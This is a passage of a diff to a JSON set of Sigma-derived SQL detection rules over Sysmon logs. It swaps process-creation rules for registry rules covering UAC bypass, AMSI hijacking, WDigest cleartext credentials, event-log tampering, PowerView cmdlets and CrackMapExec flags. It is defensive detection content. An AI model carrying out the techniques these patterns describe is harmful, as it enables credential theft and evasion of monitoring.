'%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u 